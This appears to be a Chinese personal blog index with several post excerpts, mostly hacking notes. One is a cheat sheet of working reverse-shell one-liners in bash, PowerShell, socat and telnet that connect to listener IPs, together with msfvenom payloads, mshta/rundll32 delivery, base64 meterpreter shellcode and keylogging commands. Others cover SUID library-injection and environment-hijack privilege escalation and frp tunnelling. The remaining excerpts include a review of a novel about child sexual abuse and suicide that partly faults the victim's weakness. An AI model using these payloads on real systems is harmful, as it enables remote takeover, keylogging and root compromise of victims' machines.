发表于 | 分类于

linux系统40多种不同类型的反弹shell

  1. linux比windows反弹shell的手法要多得多

  2. msf的shellcode加载器msfvenom msfvenom -l payload |grep cmd/unix 如何查找自己需要的shellcode类型

  3. 40多种linux反弹shell的手法

  4. 反弹shell攻击的防御

msfvenom一句话反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
    cmd/unix/bind_awk                                   Listen for a connection and spawn a command shell via GNU AWK
    cmd/unix/bind_busybox_telnetd                       Listen for a connection and spawn a command shell via BusyBox telnetd
    cmd/unix/bind_inetd                                 Listen for a connection and spawn a command shell (persistent)
    cmd/unix/bind_jjs                                   Listen for a connection and spawn a command shell via jjs
    cmd/unix/bind_lua                                   Listen for a connection and spawn a command shell via Lua
    cmd/unix/bind_netcat                                Listen for a connection and spawn a command shell via netcat
    cmd/unix/bind_netcat_gaping                         Listen for a connection and spawn a command shell via netcat
    cmd/unix/bind_netcat_gaping_ipv6                    Listen for a connection and spawn a command shell via netcat
    cmd/unix/bind_nodejs                                Continually listen for a connection and spawn a command shell via nodejs
    cmd/unix/bind_perl                                  Listen for a connection and spawn a command shell via perl
    cmd/unix/bind_perl_ipv6                             Listen for a connection and spawn a command shell via perl
    cmd/unix/bind_r                                     Continually listen for a connection and spawn a command shell via R
    cmd/unix/bind_ruby                                  Continually listen for a connection and spawn a command shell via Ruby
    cmd/unix/bind_ruby_ipv6                             Continually listen for a connection and spawn a command shell via Ruby
    cmd/unix/bind_socat_udp                             Creates an interactive shell via socat
    cmd/unix/bind_stub                                  Listen for a connection and spawn a command shell (stub only, no payload)
    cmd/unix/bind_zsh                                   Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default.
    cmd/unix/generic                                    Executes the supplied command
    cmd/unix/interact                                   Interacts with a shell on an established socket connection
    cmd/unix/pingback_bind                              Accept a connection, send a UUID, then exit
    cmd/unix/pingback_reverse                           Creates a socket, send a UUID, then exit
    cmd/unix/reverse                                    Creates an interactive shell through two inbound connections
    cmd/unix/reverse_awk                                Creates an interactive shell via GNU AWK
    cmd/unix/reverse_bash                               Creates an interactive shell via bash's builtin /dev/tcp. This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/tcp feature.
    cmd/unix/reverse_bash_telnet_ssl                    Creates an interactive shell via mkfifo and telnet. This method works on Debian and other systems compiled without /dev/tcp support. This module uses the '-z' option included on some systems to encrypt using SSL.
    cmd/unix/reverse_bash_udp                           Creates an interactive shell via bash's builtin /dev/udp. This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/udp feature.
    cmd/unix/reverse_jjs                                Connect back and create a command shell via jjs
    cmd/unix/reverse_ksh                                Connect back and create a command shell via Ksh. Note: Although Ksh is often available, please be aware it isn't usually installed by default.
    cmd/unix/reverse_lua                                Creates an interactive shell via Lua
    cmd/unix/reverse_ncat_ssl                           Creates an interactive shell via ncat, utilizing ssl mode
    cmd/unix/reverse_netcat                             Creates an interactive shell via netcat
    cmd/unix/reverse_netcat_gaping                      Creates an interactive shell via netcat
    cmd/unix/reverse_nodejs                             Continually listen for a connection and spawn a command shell via nodejs
    cmd/unix/reverse_openssl                            Creates an interactive shell through two inbound connections
    cmd/unix/reverse_perl                               Creates an interactive shell via perl
    cmd/unix/reverse_perl_ssl                           Creates an interactive shell via perl, uses SSL
    cmd/unix/reverse_php_ssl                            Creates an interactive shell via php, uses SSL
    cmd/unix/reverse_python                             Connect back and create a command shell via Python
    cmd/unix/reverse_python_ssl                         Creates an interactive shell via python, uses SSL, encodes with base64 by design.
    cmd/unix/reverse_r                                  Connect back and create a command shell via R
    cmd/unix/reverse_ruby                               Connect back and create a command shell via Ruby
    cmd/unix/reverse_ruby_ssl                           Connect back and create a command shell via Ruby, uses SSL
    cmd/unix/reverse_socat_udp                          Creates an interactive shell via socat
    cmd/unix/reverse_ssh                                Connect back and create a command shell via SSH
    cmd/unix/reverse_ssl_double_telnet                  Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option
    cmd/unix/reverse_stub                               Creates an interactive shell through an inbound connection (stub only, no payload)
    cmd/unix/reverse_tclsh                              Creates an interactive shell via Tclsh
    cmd/unix/reverse_zsh                                Connect back and create a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default.
    tty/unix/interact                                   Interacts with a TTY on an established socket connection

常用一句话反弹shell命令速查

linux cmd

1
2
3
4
5
handler -H 10.10.14.7 -P 6678 -p cmd/unix/reverse_bash

msfvenom -p cmd/unix/reverse_bash LHOST=10.10.14.7 LPORT=6678 -f raw

0<&43-;exec 43<>/dev/tcp/192.168.123.123/6678;sh <&43 >&43 2>&43

python reverse

1
2
3
4
handler -H 192.168.123.123 -P 6688 -p cmd/unix/reverse_python

msfvenom -p cmd/unix/reverse_python LHOST=192.168.123.123 LPORT=6688 -f raw

session -u $session-id

可以新建一个meterpreter类型的session。

得到meterpreter的session以后

1
2
3
keyscan_start

keyscan_dump

可以进行键盘记录

参考资料

阅读全文 »

发表于 | 分类于

零组文库: https://www.ddosi.com/b442/#%E9%9B%B6%E7%BB%84%E9%95%9C%E5%83%8F%E4%B8%8B%E8%BD%BD%E5%9C%B0%E5%9D%80

为什么要录视频,视频和文章有什么区别

  1. 你自己都不会,你拿什么给别人讲懂呢?

  2. 避免自己遗忘,加深理解

  3. 交到同行业的朋友(目前已达成大部分目标,粉丝1500+)

1
2
3
wget https://github.com/fatedier/frp/releases/download/v0.34.1/frp_0.34.1_linux_amd64.tar.gz
tar -zxvf frp_0.34.1_linux_amd64.tar.gz
cd frp_0.34.1_linux_amd64

主要分为两步骤

步骤一:配置frp的客户端(无需配置服务端)

1
2
3
4
5
6
7
8
9
[common]
server_addr = vps的ip
server_port = 7000   #这个是默认的端口,无需更改

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = aaa #本地要开放的端口
remote_port = bbb  #访问vps的哪个端口

当frp配置成功以后,访问远程的端口bbb=访问内网的端口aaa

步骤二: python -m SimpleHTTPServer

开放内网的服务,让外网能访问到。因为这里开放的是8000端口,所以步骤一的local_port = 8000

remote_port = 8000,这个端口可以随便定,只要是vps上没有用过的端口,都可以使用。访问vps:8000,就等于访问内网的8000端口。

步骤三:运行frp的服务端和客户端

1
2
3
4
5
【vps】
./frps -c ./frps.ini

【kali-msf】
./frpc -c ./frpc.ini

步骤四:访问http://vps:8000,就可以成功访问内网的服务了。

某公司云主机安全测试

阅读全文 »

发表于 | 分类于

是谁把贞操牢牢刻在每个人的思想里面?

封建社会已经过去了一百多年了,封建思想在这片土地上统治了有几千年。与此同时,女性的地位也深受压迫了几千年。在以前,一个女性要是失去了丈夫,那么她就成了一个寡妇,寡妇要为了丈夫守贞。

我不知道该怎么描述房思琪的事情。

我有一种深深的无力感。因为我知道什么也改变不了。

改变不了人们对儿童性教育假性遗忘,改变不了猥亵儿童的犯罪者将手伸向豆蔻之年的花朵。

总之,这个由真实事件改编的小说反映了几个事实。

  1. 只要社会的男性把女性当成是资源,把拥有过多少女性当成是战利品。那么性侵这件事永远不会变少。你以为性侵的都是没有钱去找妓女的人吗?不是,他们享受的是强大的权力、地位等等所带来的支配弱者的征服感。

  2. 女性能够做的事情很少,我们都是幸存者。被伤害是一种概率,而不是受害者有罪。

刚刚把这本书看完了。一开始我不明白房思琪为什么和强奸犯纠缠了几年。

要知道,错误的事情,无论包装的多么精致,都不应该沉迷进去。

我尝试以自己的三观去解读这件事情,并且理解她的视角。

房思琪是一个富家女,在十三岁的时候,强奸犯住在她家隔壁(不好意思,我实在不能用老师这个词语去形容他),qjf是一个德高望重的补习班名校老师(比房思琪大37岁,也就是50岁),房思琪的父母从来没有教育过孩子任何有关性方面的内容(天知道没有性,房思琪是怎么被她妈生下来的)。在房思琪像qjf请教作文的时候,她被qj了,甚至为此道歉。

房思琪是个精致、美丽、聪明的女孩,在她的脑子里从来没有被人灌输过有关性的一切。她被qjf欺骗,说是爱情,她是被爱的。在长达5年的过程中,一直与qjf保持着这种不正常的关系。

也许她在第一次被强迫口j的时候,就应该站出来,向父母求助。也好过身心被伤害,无法过正常的生活,26岁终于自杀。

热爱文学的人也许内心都很纤细,什么是痛苦,什么是美,体会的比常人更加深刻。

作者在自杀前,曾经接受过采访,她透露出,这段关系里面是有爱的。如果没有爱,就没有这么痛苦了。

如果只是单纯的qj,那么该报案的报案,该坐牢的坐牢。而不会将一段不正常的关系维持了5年之久。

社会上的都说,被qj是受害者自己的错。不是的,作者一丁点儿错都没有。

但是她就像一个精致的透明水晶高脚杯一样,受伤害了,然后碎了。说这是谁的错?qjf固然有错,社会固然有问题。但是也许她可以更坚强更勇敢。

如果她像我一样勇敢,那么很多事情都不会发生了。也就是因为她是一个弱者,只会用文字表达在她身上遭受的伤害,所以我们才能看到这本书《房思琪的初恋乐园》。这真是一个悖论。

我尝试去理解她。但是因为三观、成长环境等等都不同。所以只能猜测,无法产生共鸣。

我不知道一个比自己大三十七岁,还强迫发生关系的老头子有什么可爱之处。但是不要对受害者要求太高,以为每个女性都是花木兰那不现实。

如果里面真的有爱情,那么作者最后就不会得抑郁症了,也就不会自杀了。可是明眼人都看得出来,qjf不过是在玩弄她罢了。

离13岁的我已经过去太久了,我不太记得清楚小时候的想法。13岁,也就是十岁出头,来到这世界上才不过十余年,相对于浩瀚的宇宙来说,动辄上千年的历史来说,太渺小了。这样稚嫩的年纪,什么都懂一点点,但是也什么都不懂。有些长得快的小孩子可能身高超过了一些成年人,但是内心却跟不上现代社会的营养过剩发育迅速,还停留在儿童阶段。

是什么让一个13岁的女孩反复的去找一个qjf,我认为,缺失的家庭教育要担任首要的责任。如果父母把小孩当成朋友的话,如果父母和孩子无话不谈的话,那么这个小女孩在遭受如此粗暴对待的时候,是不可能不跟父母倾诉的。

在书里面,房思琪的父母据说经常出差,所以让qjf无所顾忌,觉得房思琪不会说出来。确实如此,作者一直到死都没有说出来。是谁伤害了我?在我身上发生了什么?当作者自杀以后,一切都太晚了。

为什么世界上有人宁愿伤害自己,也不愿意伤害别人。

据说作者出生在一个古老的医学世家,并且得了抑郁症还考上了医科大学。因为病情辍学以后又考上了一个中文系。

她的家庭要求她优秀,但是不要求她幸福、快乐。

我想想,她的父母只怕是这么想的:一个女孩子,考最好的学校,打扮的漂漂亮亮,然后嫁给一个好丈夫。没有人鼓励她发挥自己的个性,没有人在乎她的理想,没有人在乎她幸不幸福,快不快乐。

那么她选择离开这个世界,也是情有可原的。

那些自杀者不是看不清,而是看得太清楚。他们想明白了一切,而不是别人口中的想不开。

阅读全文 »

发表于 | 分类于

引子

以你现在的速度你只能逗留原地。如果你要抵达另一个地方,你必须以双倍于现在的速度奔跑。

思维导图和教程

反弹shell- 视频目录

一句话反弹shell&Reverse Shell In Windows

windows

mshta.exe

成功的操作

1
2
3
4
5
6
7
8
use exploit/windows/misc/hta_server
set srvhost 10.100.19.19
set lhost 10.100.19.19
set SRVPORT 53
exploit

mshta.exe http://10.100.19.19:53/tA7YRzR.hta

1

失败的操作

设置payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.19.19 LPORT=53 -f raw > shellcode.bin

cat shellcode.bin | base64 -w 0 > out.txt 将shellcode.bin base64编码

1
/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAAA1CgoTE0FUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoKQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0Ckn/znXl6JMAAABIg+wQSIniTTHJagRBWEiJ+UG6AtnIX//Vg/gAflVIg8QgXon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnIX//Vg/gAfShYQVdZaABAAABBWGoAWkG6Cy8PMP/VV1lBunVuTWH/1Un/zuk8////SAHDSCnGSIX2dbRB/+dYagBZScfC8LWiVv/V

handler -H 10.100.19.19 -P 53 -p windows/meterpreter/reverse_tcp

mshta.exe http://10.100.19.19/CACTUSTORCH.hta

易错点

handler不能设置为exploit/multi/handler

rundll.exe

use windows/smb/smb_delivery

set srvhost 192.168.123.123

rundll32.exe \192.168.1.109\vabFG\test.dll,0

Regsvr32.exe

1
2
3
4
5
6
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set srvhost 192.168.1.109
msf exploit (web_delivery)>exploit

powershell & powercat

nc -lnvp 4455

1
2
3
4
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.123.123",4455);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
这个代码反弹失败
---
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.123.123',4455);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

linux

bash

bash tcp

nc -lnvp 4456 bash -i >& /dev/tcp/18.166.7.104/4456 0>&1

bash2 (失败)

1
2
3
nc -lnvp 4456
exec 5<>/dev/tcp/18.166.7.104/4456
cat <&5 | while read line; do $line 2>&5 >&5; done

bash udp(失败)

nc -lnvp 4457 sh -i >& /dev/udp/18.166.7.104/4457 0>&1

sh

victim:

sh -i >& /dev/udp/192.168.3.253/4242 0>&1

Centos7:

csh -i >& /dev/udp/192.168.3.253/4242 0>&1

telnet

建立连接

1
2
3
4
nc -n -vv -l -p 8080 
nc -n -vv -l -p 8081
Victim 
telnet 18.166.7.104  8080 | /bin/bash | telnet 18.166.7.104  8081

反弹shell

1
2
nc -lnvp 4456
rm -f /tmp/p; mknod /tmp/p p && telnet 18.166.7.104 4456 0/tmp/p

socat

建立连接

目标机器监听: socat TCP4-listen:4433 STDOUT

本地连接目标机器: socat - TCP4:18.166.7.104:4433

反弹shell

vps(18.166.7.104)上监听: socat -d -d TCP4-LISTEN:4434 STDOUT

本地kali将shell发送到vps (内网机器运行)socat TCP4:18.166.7.104:4434 EXEC:/bin/bash

反弹shell 二

1
2
(18.166.7.104公网机器运行)socat TCP4-listen:4435 STDOUT
(内网机器运行)socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:18.166.7.104:4435

参考资料

https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/

https://hackersinterview.com/oscp/reverse-shell-one-liners-oscp-cheatsheet/

阅读全文 »

发表于 | 分类于

一件事,只要是有价值的,花再长的时间去做也是值得的。

遇到问题

使用某些地区的网络就能访问,有些地区就不能。 挂梯子也访问不了了。(不知道是被墙了还是什么原因) 1

本地测试

1
2
3
4
5
6
7
8
ruby -v
sqlite3 --version
gem install rails
gem install jekyll

确保ruby环境已安装,数据库已安装。
bundle install
开始安装

2 好像不能用root权限执行,新建一个普通用户

1
2
3
4
useradd whale
passwd whale
visudo
添加whale到sudoer用户组

再次运行就没问题了。 bundle install 等待许久,安装依赖。

安装环境

1
2
3
4
先测试内网ip
bundle exec jekyll serve

bundle

3

没问题了,再运行在外网ip上。

在vps上运行

1
2
git clone https://github.com/Whale3070/Whale3070.github.io
bundle exec jekyll serve --host=外网ip

解决问题

  1. 更新

1.1 ruby更新 升级到ruby 2.6 在ruby 2.5.1运行会出现问题。jekyll不支持

解决办法:卸载老版本的ruby,然后重装新版本的。

1.2 gem更新 gem -v 3.0.3 gem update –system

1.3 bundler更新 bundle update –bundler

  1. bundle install报错

4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
apt-get install ruby-dev
执行成功
gem install commonmarker -v '0.17.13' --source 'https://rubygems.org/'
执行失败
gem install commonmarker
执行失败,报错
ruby -v
执行成功
rvm
执行失败
curl -sSL https://rvm.io/mpapis.asc | sudo gpg --import -
curl -sSL https://rvm.io/pkuczynski.asc | sudo gpg --import -
curl -L https://get.rvm.io | bash -s stable
执行成功
rvm list
执行失败
cd /usr/local/rvm/bin;./rvm list known

5

1
./rvm install 2.7.0

6

1
2
3
4
5
6
7
8
9
./rvm list
./rvm 2.7.0 --default

gem install rails
rails --version
bundle install
bundle exec jekyll serve
执行成功
访问http://127.0.0.1:4000,没问题以后,再架设到外部ip

端口转发

ifconfig,发现vps只有两个内网ip,并且无法绑定到弹性ip上。

1
2
ps -ef | grep jekyll
bundle exec jekyll serve --host=172.31.10.237

图片挂了

发现raw.githubusercontent.com被墙了。 写一个脚本,将下列字符串做一个替换

1
2
3
4
5
6
7
8
raw.githubusercontent.com/Whale3070/Whale3070.github.io/master
替换为
18.166.144.145:4000

sed -i 's/https:\/\/raw.githubusercontent.com\/Whale3070\/Whale3070.github.io\/master/http:\/\/18.166.144.145:4000/g' 2020-05-13*

测试没问题,图片好了以后,进行全局替换
sed -i 's/https:\/\/raw.githubusercontent.com\/Whale3070\/Whale3070.github.io\/master/http:\/\/18.166.144.145:4000/g' _posts/*.md

7

确认没问题,在加-i参数 sed -i ‘s/raw.githubusercontent.com\/Whale3070\/Whale3070.github.io\/master/18.166.144.145:4000/g’ 2020-05-13*

ruby报错

/usr/lib/ruby/vendor_ruby/rubygems/defaults/operating_system.rb:10: warning: constant Gem::ConfigMap is deprecated https://github.com/rubygems/rubygems/issues/3068

参考资料

https://ruby-china.github.io/rails-guides/getting_started.html

https://www.jekyll.com.cn/docs/

阅读全文 »

发表于 | 分类于

制作的视频教程

https://www.bilibili.com/video/BV1ok4y1m75p

方法一:shared object注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
find / -type f -perm -04000 -ls 2>/dev/null
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
mkdir /home/user/.config
vi libcalc.c


#include <stdio.h> 
#include <stdlib.h> 
static void inject() __attribute__((constructor)); 
void inject() { 
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); 
}

gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c

/usr/local/bin/suid-so

原理:某些程序运行时候,有着管理员权限,却可以被任何用户调用,这就是suid权限。 如果这个suid程序调用了某些shared object,可以通过伪造shared object,来伪造命令。以该程序的root权限,去执行提权命令。 cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p

注意,suid权限必须是二进制程序才能用,脚本程序是无效的。 概念:动态链接与静态链接的区别 .dll与.so的区别 编译语言编程基础,熟悉linux命令

方法二:symlik——符号链接

需要www-data权限,nginx版本在1.6.2-5+deb8u3版本以下。

发现

1
2
dpkg -l | grep nginx
su -l www-data

利用

1
2
3
4
使用exp去执行获得root权限,具体请看视频教程
/home/user/tools/nginx/nginxed-root.sh /var/log/nginx/error.log

invoke-rc.d nginx rotate >/dev/null 2>&1

方法三:环境变量

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
find / -type f -perm -04000 -ls 2>/dev/null
//查看有suid权限的程序

strings /usr/local/bin/suid-env
//查看二进制文件使用的函数

whereis service
//查看service的路径
/usr/sbin/service

---
echo $PATH
echo $USER
echo $PWD
echo $HOME
什么是环境变量:
可以使用export命令去定义环境变量
比如说:
环境变量与terminal终端息息相关,当打开了一个terminal,它就会自动加载环境
变量。
如何去使用环境变量:
export b=192.168.28.128
ping -c 4 $b

案例一:

首先了解一下export命令

1
2
3
4
5
6
7
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }

export -f /usr/sbin/service

/usr/local/bin/suid-env2

env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'

案例二:

明确两个东西,一个是环境变量,一个是函数

1
2
3
4
5
6
7
8
9
10
11
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }

//   "/usr/sbin/service" 函数名称
//   bash 定义一个很像service绝对路径的函数

export -f /usr/sbin/service
/usr/local/bin/suid-env2
//  将这个函数“/usr/sbin/service”保存到环境变量,并去执行suid程序“/usr/local/bin/suid-env2”
//   suid程序本来是想去执行service apache2 start,/usr/sbin/service
cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p;

参考资料

阅读全文 »

发表于 | 分类于

linux内核漏洞提权

只要是稍微懈怠一下,上帝会以最快的速度带走你的天赋和能力,一秒钟都不会耽搁。

https://www.bilibili.com/video/BV1Rh411o7M9

前置知识

linux操作系统

不会的,可以看《鸟哥的linux私房菜》

操作

用脚本找内核漏洞

查找exp (修改exp) 上传exp 执行exp

searchsploit

工具链接

linux-exploit-suggester.sh

LinEnum.sh

msf suggester

参考资料

https://github.com/sagishahar-zz/lpeworkshop

阅读全文 »

发表于 | 分类于

从18岁上大学,到今天已经过了近5年。其中我的很多想法都改变了,也有很多还是老样子。就像蝴蝶效应一样,很多年前做的事情,都深深影响着今天我在哪里、做着什么事、成为了什么样的人。我还是很喜欢读书,思考一些一般人觉得无稽之谈,没必要思考的问题。作为一个死宅,还是没能学会与人打交道游刃有余的手段。

阅读全文 »

发表于 | 分类于

最近有一个24岁的女大学生死了,听说是翼装飞行意外事故去世的。

我第一想法是,每年意外事故去世的那么多,为什么她的死亡会上热搜?

这就要深入介绍一下翼装飞行了。翼装飞行是一种刺激的极限运动,很烧钱,比学艺术烧钱多了。

首先要有上百次的高空跳伞经验,才能开始翼装飞行。装备十万起步,数百次跳伞经验,就算花了一百万吧,这是按少了说的。就说刘某(死者)请的教练,是世界顶级水平,就不知道要花多少钱。

这种娱乐,对于她的家庭,应该算不上什么大钱。按照她花了百分之一的钱来玩这些,那么她的家庭至少是千万富翁(当然这是按照保守情况计算的)。再联想一下19年、20年的出生率。我国的贫富差距已经快达到了极限。穷人连一胎都生不起的情况下,富人出生就是富人,世世代代都是富人。这就是资本回报率大于劳动回报率所带来的结果。趋势已经很明显了。

农村出凤凰男的几率越来越小,北京市文科状元熊轩昂说他多亏了家庭和学校的教育,现在的状元都是这种家里又好又厉害的。,说穷人越来越不可能争的过有钱人了。

也许这是一种社会达尔文主义。穷人正在逐渐被社会淘汰。就像古代佃农因为有钱人三妻四妾,而找不到老婆结不起婚一样。 现代996的所谓白领,不过是地主手下成千上万的佃农。

地主以为996是福报,也就算了。可不要身为佃农认为996也是福报。

怎么办

冷嘲热讽说了也没用,那我们应该怎么办呢?韩国人再努力,阶级固化摆在那里,内卷化摆在那里,不出国而在本国努力, 努力的结果都被有钱人收割走了。为什么这么说,假如你努力存钱,存了十年的钱,房价一下子涨了几十万。 那你选择买房,钱不就白存了。劳动被谁收割了?

这就是现实。中国平均福利太差,房价、教育、养老、医疗,压在普通人身上的三座大山,一辈子都被这个套牢了。 一旦你选择结婚生子,那你一辈子的命运已经注定了。你不在为自己而活,你活着就是劳动力,为你的父母、子女、妻子而活。

为什么某些中年男性员工一旦失业,就跳楼呢?不在局中,永远不知道压力有多大。人的悲欢并不相通。

不要轻率评价他人的痛苦。

如果贫富差距一直这么大,会带来什么结果

我们首先看一下美国,这次疫情美国什么表现,我们有目共睹。 美国是一个割裂的社会,富人更容易成为精英、穷人无知而且产业链还迁移到其他国家,导致穷人失去工作。

有很多美国人甚至不知道地球是圆的。公立学校放羊、私立学校要有钱人才读得起。美国用福利把穷人圈起来,用移民撑起了世界霸主的地位。

如果中国的贫富差距这么大。中国不是发达国家,无法用福利引导穷人生育下一代,如果又无法阻止富人在国内赚够钱,带走他们的财产。那么中国的结局似乎已经注定了。毕竟,一个连新生儿人口数都无法撑起来的国家,又怎么能再延续5000年呢?

古代没有避孕措施、没有移民、无法出国留学、工作、也没有老龄化。而现代社会,也无法模拟古代社会来延续下一代。 让我们看看2020年的生育结果吧以及人口普查结果吧。关于这方面我在知乎上高赞的回答,以及我收藏的相关回答都被删了。

比如一个老板,生了二胎、三胎,他雇佣了100名员工,其中百分之20生了二胎,百分之30生了一胎,百分之50不结婚,或者丁克,或者无法生育。那么总和生育率就是73/101 = 0.722

基本上符合资本主义国家不到1.0的生育率。网上搜索一下,始终坚持不到1.0的生育率的国家未来终于会灭亡的。只不过过去是通过战争,今天是通过主动选择了灭亡。

说实话,如果你出生在一个富裕的家庭,你的爸爸是马云、是李刚,那么这些问题都与你无缘。毕竟无产阶级斗争了几千年,断头王后安托瓦内特也就那么一个,文革中被打倒的臭老九也已经是过去式了,这种历史在你短短的几十年中几乎不会再重演了。

韩国网络上近日流行起“勺子阶级论”,这种阶级论把20~39岁年轻人的父母年收入等家庭背景比喻为各种不同的“勺子”,按照家庭背景可分为“金勺”、“银勺”、“铜勺”和“土勺”四个不同阶级。

从具体标准来看,“金勺”指家庭财产高于20亿韩元(约合人民币1143万元)或年收入高于2亿韩元;“银勺”指家庭财产高于10亿韩元或年收入高于1亿韩元;“铜勺”指家庭财产高于5亿韩元或年收入5500万韩元;家庭财产低于5000万韩元或年收入低于2000万韩元的则被称为“土勺”。

韩国20~39岁年轻人面临着就业难、结婚难、低收入等种种问题,这样的境遇让他们相信,无论个人多么努力积累财富,永远不会“富得过”那些继承父母大量遗产的“金汤勺”们。

阅读全文 »